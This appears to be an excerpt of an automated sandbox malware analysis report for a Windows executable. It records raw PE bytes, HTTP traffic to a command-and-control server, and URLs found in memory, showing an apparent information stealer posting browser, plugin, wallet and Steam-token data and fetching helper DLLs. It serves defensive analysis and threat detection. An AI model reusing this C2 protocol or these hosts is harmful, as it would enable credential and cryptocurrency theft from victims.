00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="hwid"992A4140186F1350827015------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="build"reno------KEBFHIJECFIDGDGCGHCG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="message"browsers------JDAFBKECAKFCAAAKJDAK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"plugins------HJJKFBGCFHCGDHIDAAEC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="message"fplugins------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.215.113.115Content-Length: 6295Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJDHost: 185.215.113.115Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="file"------FHIDAFHCBAKFCAAKFCFC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file"------GHDAAKJEGCFCAKEBKJJE--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.115Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="message"wallets------EGCGHCBKFCFBFHIDHDBF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="message"files------AAAKEBGDAFHIIDHIIECF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBKHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="file"------AFIIEBGCAAECBGCBGCBK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"ybncbhylepme------JJJKFBAAAFHJEBFIEGID--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHIEBAAKJDHIECAAFHCA--
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 185.215.113.115
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49759 -> 185.215.113.115:80
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59CC60 PR_Recv, 0_2_6C59CC60
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /th?id=OADD2.10239385917469_1PJ7CJICMRWKJR5SF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /th?id=OADD2.10239385917470_1O4L0U46N29EF81I2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /th?id=OADD2.10239354941421_1QFMKZTDAH37OHMPJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /th?id=OADD2.10239354941422_128KB82EECTAVENHE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /th?id=OADD2.10239400678274_1AGJJ9P2O7V6V1431&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /th?id=OADD2.10239400678275_1MGQ4V998SN0MOXXU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1
    Host: play.google.com
    Connection: keep-alive
    Content-Length: 907
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-platform: "Windows"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    Accept: */*
    Origin: chrome-untrusted://new-tab-page
    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.115
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllO
Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllbN
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dlle
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dllBN
Source: random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dllzN
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dllw
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dllA
Source: random(1).exe, 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll=
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll.
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll;
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllc
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlln
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/Y
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php%0
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpAAFBGDBKJJJKFIIIJ
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpC
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpO
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpR0
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpW
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phper
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpl
Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpp
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprowser
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpve
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.115c4becf79229cb002.phpser
